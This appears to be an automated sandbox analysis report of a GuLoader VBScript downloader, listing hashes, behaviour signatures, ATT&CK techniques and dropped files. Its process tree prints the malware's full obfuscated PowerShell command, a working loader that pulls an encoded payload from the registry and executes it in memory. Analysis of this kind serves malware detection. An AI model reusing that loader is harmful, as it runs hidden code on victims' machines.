guloader | f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e

General

Target

f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e.vbs
Size

339KB
MD5

6af7dfbc2f5a867f11b8adff1150b5ba
SHA1

8e1d49a3856c57da40973102a96b892a31dee7f6
SHA256

f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e
SHA512

cd4ea26ffc7b60baf9d92ac64f02babec4a2d93a0bdb4d8d81d95888d83bb5183a8ba8e953fc5f3f264dbec4f239d4f4023825886be022503a6cfebc861ce1c7
SSDEEP

6144:dACvjkhn6pTmKLnbMhZYAEwISL7+qhMRRGdIf5fjeIdnB:dAC+n8SKLnEyc7+sMkoB

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

2 900 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
2	900	WScript.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

268 powershell.exe

pid	process
268	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	268	powershell.exe
Token: 33	1652	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1652	AUDIODG.EXE
Token: 33	1652	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1652	AUDIODG.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 900 wrote to memory of 268	900	WScript.exe	powershell.exe
PID 900 wrote to memory of 268	900	WScript.exe	powershell.exe
PID 900 wrote to memory of 268	900	WScript.exe	powershell.exe
PID 900 wrote to memory of 268	900	WScript.exe	powershell.exe
PID 268 wrote to memory of 1704	268	powershell.exe	csc.exe
PID 268 wrote to memory of 1704	268	powershell.exe	csc.exe
PID 268 wrote to memory of 1704	268	powershell.exe	csc.exe
PID 268 wrote to memory of 1704	268	powershell.exe	csc.exe
PID 1704 wrote to memory of 1644	1704	csc.exe	cvtres.exe
PID 1704 wrote to memory of 1644	1704	csc.exe	cvtres.exe
PID 1704 wrote to memory of 1644	1704	csc.exe	cvtres.exe
PID 1704 wrote to memory of 1644	1704	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e.vbs"
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Raillerendes = """OmostABermmdHavebdFunni-SiddeTSkovryTavenpPseudeFilet Waitr-Moll TGhostyApplipselvbeOniomDSkrppeDobbefSprutiIntegnOptaniGladdtAssasitierloHindunAmeri menth'Agog uUffossHerreiNonornArtligHiela ArveaSInebryOverdsNomogtFrgeteSpademDoari;SkylduBoonysOrdenikamfenBevgegSchoo OverjSAscenySvesksLathwtBrigaeUndermTellu.DeligRPhoneuUrovanSubjetSalgbiRaacrmStoneeCentu.RegatIIolitnNitratIneffeKalasrSkyggoArctipraabaSfibereChaetrSyncovGummiiTsenacDampseSunetsCasea;Ctge pGlairuEleusbUstemlMineriPackecShred UncensnonvatOutstaSuspetKomitiIndtjcTrave SknnecbunyalPareeaUlemasHovelsKunst EnbaaUnedtrbBlokaiSfrisqOna CuProclaclunirunperiGraenaMorgenArbej1Brat {Ordme[SuperDSurinlFrafalKlaveITubermDiasppEnkeloWivanrBevgetsdlad(Carte`"""PublikfundaeAftenrMeeklnScreaeTrilllIndby3faire2Belin`"""Ename)Super]solilpQuartujollebMeddelFrijaidernecLeuco scampsAlfabtTisseaKerautInteriCamercStrab TobiseUngdyxImpretdebareBlastrSjakrnNeutr KondiiIdolinPoly tSkill FladsStumbleLandstUnaleEBruttnKattevDampbiAntitrCand oGrowsnLovkemIntereDrslgnEllevtLotmeVDaekkaRevolrHjertiBroddaSketcbcertilForskeKathe(reaktiHjertnPhenatPhoto NnsomPKailyhStileaBradyeSkulknBattl,BengeiBogklnSo Putpjokk JammeLLimpioFruitxAnthooKontosUnpar)Pooft;Smitt[OverpDCrowsltechnlTelefIUbetimUshabpInderoTaklirJornstDirek(polre`"""IndviwActiniPressnPlovmsCampupPektioBacheoLignolStrat.RmnindtesturKraftvUdspe`"""Flee )Lumbo]KlasspSimuluDetenbStilllJulemiSnitccFolke DagfisstethtDigtaaMosertKaerkiMeloncrevet FinnieIagttxUddritIntereRiflirAdditnRashe EmbaliSejl nLnkontSubce bromcECertinBrugbuAgatemHalvgPAhmedrAktieiSatranIndkatTjenePGenudrAlkohoUnconcTrembeKursusFingesHumoroFrg TrTetraDLedniaAfslutNdrinaBelshtdeperyFinelpklumseOverssForle(AarsaiscopansoldatKejse TilliSAccoiaOphavmSuperlAerog,AsbesiBataanmarketEkste LifliAMushrnOxalitlivsseAlder,tabskiParasnCallitJernm UnnorITellusSsonshSeptamNeuroaToccaeSusta,SelveiHenlanPrevotHumrf ThingPStifteLithilVeinatAfstraWhang,Sond iKritenUnzontHjert BekraTStramoDispawIdeol,GenskiNonnonYppigtProtr TolteCUnttroLejliudispulTuninoPlsebmSpeci,TeleoiGestinOpsumtSumpg TransKSammelUdkkeuStandmBrackpGlori7deval0Georg)Smrin;Adels[AnilaDDjavelCallilNonveIKatabmFaciepTenenoAnsvarudviktimper(Uncof`"""tommeuLumacsChloreMusikrGulli3Creat2Prima`"""Provo)Cecch]TrovrpHypnouTarasbAstrolSlnggiSpunncOracu BecomsSnifftPhageaTomkitAdganiWhirlcnight SkyrieKirmexoligotLaboreLavenrBrominSkarp MustiiAfholninexptMedal OverrGMaskieKonomtUnfixSStorkcLaborrChickoLeverlgenbrlCalotRfortraKlagenStngngNonreeForbn(LydspiRstennTvrvetSpeci KnaphamodvinFinskvPyrogeEyestnYippidHobby,SpunsiRelinnPeerltPorte RoystTJoculiAngiotNedlg,ForpaiKns UnNeurotHotsh FolkeBHeraceAdvermSaithgWansotFumag,ExsufiSouthnLigkatAprax DonkeCExprooTraumsHepatmHastvoRelat)Sphen;Murmu[EmigrDUdhnglGbakklVideoIKonvemEjacupKaravoRetmsroreodtPerse(Tropi`"""ThundkUdspreDatabrNowhenTraiteRebstlBreas3Skift2Seawi`"""Ufriv)Under]SpirepMarrouUnescbFrifilSvaleiDdfdscChole TormisFartbtCarilaIndtjtskkesiMogulcMinim BedaaeSkambxDispltUdmareDandyrCarlinOvere fatteiSmallnNonsutDybst MistrSGrsk eStrejtDksskCPosseoDupskmMaintmFarciSKledgtSpildaStradtChefseTungt(NonpriKamiknBurnitFodbo afrusMLetsiuDecimsBillsiUngtjcYanat,BaskeiBydelnUnebbtQuist upgroUThrenmAutoriFilmsrSydamiNorma)Hosst;Unsta[ElectDBhowalplashlAhuehIIndenmTrapepSizesoCommarstuditUpgra(Vgkor`"""DeadfgprodsdMelliiDubbe3Matri2Turis`"""Misfo)Lully]SaltwpStanduKendibhemoplReferiSalmecSubst PhacosRatihtLysinaMetamtUnderiSmagscOverh SemafeSuperxGleamtVha PeLaughrmonotnNutri BolleiKimminOffertDisse PouchGEnergeDuetttRuderTBkkeneTrypexSupintScuffCIgnorhAnuncaUnwarrChetaaHase cFortltImpuleBurlarLagerECimbrxIdolatUnequrBartiaUnder(FabriiFenesnEngeltOrbel BrekrSAdwarhSprgeuad fonJorun1Kolds6Frnde1Deici)Brodk;aligh[ElskoDImprglMisstlUnicoIStakomFrilapRegleoSerjerAfgastGrump(Mosle`"""RnkefgAntiedBjrneifilia3pigta2Overk`"""Medic)Flok ]SandwpArabsuEwderbRoedolfjerdiAftrdcNomen VellosTopattKonceaPersottuxediGaiascCoeru SoegeeStowpxStriktIndkaeYpperrFlygtnUreel DismaiSammenSerietProte CanoeGAskleedasketElskeFPolaroTemponUdplytFaux LExhalaDanilnForetgDroneuHyposaByraagOpenceIslanITransnJonglfAzocooMolin(barytiRotunnEclattopper Pads OJoubavPlanleSprs )ozonl;Pensi[MaterDCentrlBundflBane ISpirumHesitpFrivooJuvelrDatamtTalar(Fremd`"""IlleguTomatsRansaeAmenorSwelt3Auxot2Subse`"""Skrat)Untot]BrdebpKontruJabbebInterlGruppiDundycMatth equilsStnintAustraUnmectKondiiStjlecGgegu SynsfeJvninxHypostDicareTransrIrratnTypen ChordvPecunoCivvyiByomrdPlatt GardemPolygoNasotuOvercsGermaeSprog_MissieModspvInsuleUptilnReoxitFalds(KedeliIngegnSubtltVarml LappeLBissoaDenienDistrdFrysesGaybidParts,SteariSonysnoksertSubha PrecoVVolcaaSewernOpvarePreen,FoddeiRorqunSocintUnsom KalipPVvstyrChampeenlarsScapeuSikke,CreatiSpeednAfgratspads SpredRSelvhehomeoaKavalnRallunAbbas,Wick iNonlunEnswetBalle ArkivRAntiduPletinGrupptNonma)abnor;Douci[ReoutDTonsolEngralKohisImechamCartepSubmioBoomerKaraktScoop(anapt`"""EposeABalg DDeuteVskattASkosvPHoldnITegle3Calam2Boxwo.ForurDkaritLmycelLTelep`"""Trans)Entre]PhotopVolumuShrufbChanflinciciJodticrutil SurmosTouchtSulkiaHomoetindseiFrakecBehav SeedfeBestixBeskftVichyeSankerCypranAlder SkiagiKjrulnBocedtSlutb MonitROverseMyonegLavenQTrkpauRepayePetunrUnavnyAposeVRedheaSnyltlAtlanuIndkleOsteoERecomxTekst(ThundiPiurinCalfhtWindy SkrivcSamvioHykleuSkillnLectitProsp,FossiiOlivenOutswtLyric Undt mRadenaBottsiMalle,AgariiGodtenAloewtrvene GldelDObligulindblFortrlrokadeGldes,PapabiAtomvnTipistPriso FangeMArkiviAlbuerAtomkaMerudtPosseiPizza,DuettiDobl nKeel tBefor NoncoCBjrneoOmvursRacinmSolde,ZaniniBusstnDyttetSkrue VindiSWilheeCaragnFaldesInforifossufJudah)taxif;Confu[ViduaDForhrlTribolSyresIportymHealfpmaksioMailsrMenedtDical(Threa`"""OverfuPlanlsuncoreJozetrAllin3Centr2Pread`"""Trich)Sampl]meritpOpblduEfterbOpraalProduiMntuncFutur CyklusPotastAndelaSystetStrudiegrescMinis CentaeExuldxVaerdtJoannegrafbrRelatnAfpro DelatiunoccnBelaitKapit HeterIVervenDittesNonfieBroncrTrolotLdrevMTernaeSpndenScopouAfskn(MicroiEksisnGenevtdinky VanskSPedanuFagudlsuler,RysteicocknnStorvtPignu MesioEgenpavbetrdoTaksa,KultuiMennenRespitLedeo HandePBidrylBuskeaDiacriOverhdlatif,SkaffiBillanFinantMtrik TyrolSFetaoeEgalirBlindvTurbo,BulbiiApprenUnrestSubpa OpiumHConveaTrekavPseudeHrelrlHogli)Gldsp;Inter[StangDPoulilbestelAfsluIForskmSpreapluftaoSektorWildwtIrres(Skyri`"""PicarkHistreWriggrHandenJuviaestrubldagen3Ven H2Indle`"""Tanka)undes]TjekkpAlderuMiridbEcclelStimeiIndlacPrere TudsesDiskutSkibsaVippetTritiiErobrcSoliq VoetseFldeoxOophotTabeleRapkfrHeritnTheri RifleiSportnFjerktbille KrysaVAmantiembowrNonprtEveryuPhotoaLaboulHespeAHelbrlOxbitlAfteroBaroncTilvoEPersoxAreol(SquatiOrrownSpilltgotha BicorvCompl0Parke,BarneiGradinMetactVagin SaddevDeedb1Maked,GenopiHelicnRessotIndsk attacvStraf2Tilba,NevusimellenBarettOarfi SalubvLamin3Yngle,SknliiUtugtnNunbitEbull KlipfvLinie4Forma)Hoved;Recry[AischDVoldtlBagaglSheveIDaisymDiurepVirksoRoselrRemattBortf(Inqui`"""QuinqkIrreaeTilkrrbureanForsyeRowdylFluid3Unass2Robin`"""Parac)Dilat]HektopAristuStudebSortilHatteiParamcPatro DejkrsCollotLogfiaSkramtcarvoiUnmarcSchoo OpspaeLucubxPirattImpreeLeewarCroppnSgsma Pinx ICurtanplacktFlaadPStriptFlexirUnbil VragrEHls Bndame uFamilmCatalSSorelyForflsDimertBygrneSkrmrmAfstdLFutiloInchocColluaforvelSommeeGlandsEksisAOvert(BeeheuNectaiKantnnNoncatJomfr TypehvGavnl1Valut,EstiviToilenTidvitBlikd delesvUncon2Layou)Brnei;Tempe[afstaDJeaablArbejlBindiIBitstmResetpBdelloStaberEkingtLarme(Brand`"""PrejuwVodouiAlabanWhittsVsenspLilleolituroRustnlSubve.UdgivdVandlrafmelvPigeb`"""Overr)Rundk]VidtspFulmauOxidabunderlBumleiWiddlcUdse LancesHaltetRuralaWoodktStyrkiTredocDecad PiggyeMaltnxHalbetMagnieTarnarVenernGlunc AntieiSaturnCoevotMislo GallaDRnevieCorpolGammaeCrooktMusopemoradPUnfluoStenfrOveratPumic(OmandiEksamnUndertTirsd BosatMMaskiaGummarSteencClodhhsphra,TuckeiGastrnStenltDeaco TransOChallpArgumrRendy,PrismiPageunRenowtInter DrawsKtyfoiaBogenmOpsta)patar;feu m[diffeDteleolhugnilIdrifIAlopemPansrpNedgjoVaganrHauratDruth(Jazzm`"""ArachuBrnebsHorteeJanosrEmbed3Opsig2Ramle`"""Ulovm)Inval]VocalpSamekuMediabGametlHoffeiHaarfcRokke PeriosKansltunricaHulhetmediciStangcCatyd FirkaeHazelxtubertMoodiePrefarKommunMisex LaaneiDeplunhimmetRefus TabelSTeknoeEnogttDepreDRetsklTophngCisrhIBermmtPopulePpi FmBotswTUsbekebassixSupertafskr(SalteiIndeknDispetSagsa RelatSVisuapAilereAnosm,SysteiBlastnDesartRetou DiagrPKonkuoNoncodSminkaEksdi,ImmeniInternGodbitLatom AppreEunspalBrydneAnaps)Coped;Decyl}Pleje'Cirku;Compa`$DidapUbookybInteriFiertqAgitauAmfitaRecaurProtoiAlgotaLithonMaart3Kreds=Musik[GonzaUAprilbHvirviEmanuqaftenuLysogaBrewerPdagoiSkdenaDialonGylde1Forfa]Chalc:Komma:LagerVSemiqiEuroprIdoldtMicrouStaalaWestwlJitneAmoxo lPhililCigaroSpulicanalyERisibxbldgr(Indvn-Oktan1Kreti,Reine0Nonpr,Taftf1seism0Skatt4Tulla8Hw Hy5Tenuo7Rundp6Colov,Bbs A1Spiri2Intri2Under8Hjsso8Melle,Snees6Paddi4Gasrr)Hobby;Pleni`$SuffrLUncraeHarnidProstdHaandeBardetagglu=Monol(TartaGSociaeMyg CtTords-PelleIGrnsetNavneeNonglmKronbPSkankrstrmpoRigsrpSamekeCrackrHydrotOxytoySocia Koldt-LftenPScryiaHistotAxofuhAlche Fodtu'AurifHDimerKSarruCFrakeUTwist:Fuske\pladeRCadeaaLevigaArrannnonlioNedflkOleogkJournePrejunStruk\SparkTclaudaEscalaChillgHyperetaarehStraboHovedrStabinplowfsatlet'Mongi)Commi.ManicMFlueseSkrmmdNringlBigambSyrupeBijworNonspeTetra;Nords`$GeocoBStresinusselAffrelGenmaeSkabetAkkoltMatkarInspeiParcecAnklaeUrfolrMilienVikieepullo1Tauro8Leafb4alarm Vendi=vanke Kvgpr[PavenSAnticyFantasBilletHelheekontomLaird.BravuCStramoRaagenHoin vPardoeVoyagrAvisatSkumm]Zootr:Lasci:UnhooFStninrMockaoGrossmMulisBBindiaStiklsOophyeVeikk6digra4stranSCinnatPersprRehumiRedelnJudicgDysme(Sulte`$WhiteLAntoneFotohdInjecdAnonaeBdetatUnqui)Copre;Purpu[ElvteSMosaiyUdefisAlgertCoenoeRigsrmMakar.HampeRStikfuTreventilvitMumieiGennemBiofaeJusti.FiskeIChildnPrefotVaaseeMidmorSdvanoDiagopTilsySPolyseVellirTaraxvUkraiiInconcUnderepoecisAnfrs.PitprMTetroakritirPuppysCussehCanbeaTrninlToppu]Termi:Gravi:OkkerCudgruoHierapSkulkyNatio(Luteo`$UngelBKrimiiVedlglhelnolFibroeMinortIsbjrtLejderScieniYugascDrifteAntikrModulnLejebenamar1Chicl8Ravag4Teles,Deleb Vitic0Taans,spill Hyper Galli`$VenneUTvrfabRodskiJammeqFlettuIncanaHyperrOleaniSugetaStabsnstore3Rld N,malur Stran`$MiniaBUkunsiAcesclArgollDekoreTargetSpiketOpstarBagstiAldercSigneefilamrInternFlleseStyrk1Prere8Train4undif.OctilcPlanloDuftruVidernUndertBysac)Dansk;Crass[GgedaUOverfbSynkiiRulleqAvissuWalesaSeptirTenneiFiraaatonefnhoved1Artsn]Uncon:Telep:LittlEScintnBedrvuGennemInsemSCanvaySpokesUndertDryadeSjuskmVanisLHalvaoUmppicResumaChoralHonoreGenfrssidelAObser(Butin`$HalmlUVindhbCarleiTransqOphthuinvaraSalvirMicawiKontratiresnKrepl3Pyrog,Defil Acule0Syphi)Primr;""";Function Ubiquarian4 { param([String]$Baghjulstrks2); For($Unstressedness=5; $Unstressedness -lt $Baghjulstrks2.Length-1; $Unstressedness+=(5+1)){ $Ubiquarian5 = $Baghjulstrks2.'Substring'($Unstressedness, 1); $Forehood = $Forehood + $Ubiquarian5; } $Forehood;}$Baghjulstrks0 = Ubiquarian4 'ReforIWhoreEMyosuXTilra ';$Baghjulstrks1= Ubiquarian4 $Raillerendes;&$Baghjulstrks0 $Baghjulstrks1;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6kcd4g2g.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4CDA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4CD9.tmp"
4⤵
PID:1644

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:532

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x590
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6kcd4g2g.dll
Filesize
4KB

MD5
31ee29b5b383300063c1dc6b89b51f15

SHA1
52a2050ea632b9746c67574f0cdb8fe3992fc808

SHA256
072456a6d73e29fbf63233523ff76b7b53f8de5bf7ea0e088b8cfa991ea53b97

SHA512
637ce0b27021a699b84c07ab69ac84e2b7f4047882abdd434b7257f2ec4eac25b166204289b1d8a7248c7145d0307389577ffb5f0eb07ea16d857829dd58a904

Download Submit
C:\Users\Admin\AppData\Local\Temp\6kcd4g2g.pdb
Filesize
7KB

MD5
3d502f88dbdab24189b052c03efb72c3

SHA1
30e2fa3726c6dc7255aa1fe8616b50b29ca009b0

SHA256
168e6ef602f48d5d01e8b7228b5df8ab6f70f1f23af9b8701edec4722f0b4f06

SHA512
368f5be4c31c5c72488ca5503b1a1ed509f9c1e71112f12fc896d25ed86c4115a33ecde3000e3d12262de2748313ed1cd6db4467d8aa8e1c412103e63c4374c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4CDA.tmp
Filesize
1KB

MD5
3040b4bd3bed869acbef247bfeb88a3f

SHA1
ec03fac2b79503e91c68275f0cfab1e9c5970433

SHA256
378a3a7e64cfaa3ca172a6b1e4fd1fb8b2ff7b0b64fe41a2b8cf4ae9db800a0f

SHA512
569461b4cf40f8d0706e2380db447cb3c6d7ef61c642e3d2e6373e1db6826d882cba088199243ce167f1df0d03ec3a3a064d6ed2949a2bb92c0df745612c6dd8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6kcd4g2g.0.cs
Filesize
1KB

MD5
07f5f57e8d8cffc890e02735a7a28f67

SHA1
8dfc8967737e56258dc777598b151f6ad78065e2

SHA256
edd5cc9b9e60df9de211965edd2078eb72addd7884e769fecd1b5b7a2faaa69b

SHA512
3506613fd8e3faba8336868ee4b7134bd740dfbae777b53fb3bf11a1aa89cea9ad491b7d0ab35b7ae0426f18d66e1f14f002a503e25a88ab33243e033778be4e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6kcd4g2g.cmdline
Filesize
309B

MD5
845668061b3538fe99b4f4002e954cd3

SHA1
73e32c65249915ebc8f7b97c4a432a06e1cc8c71

SHA256
80d83dfb599546774702c33b57e277ca8b28ec6cbdc71e18e377434226de48bd
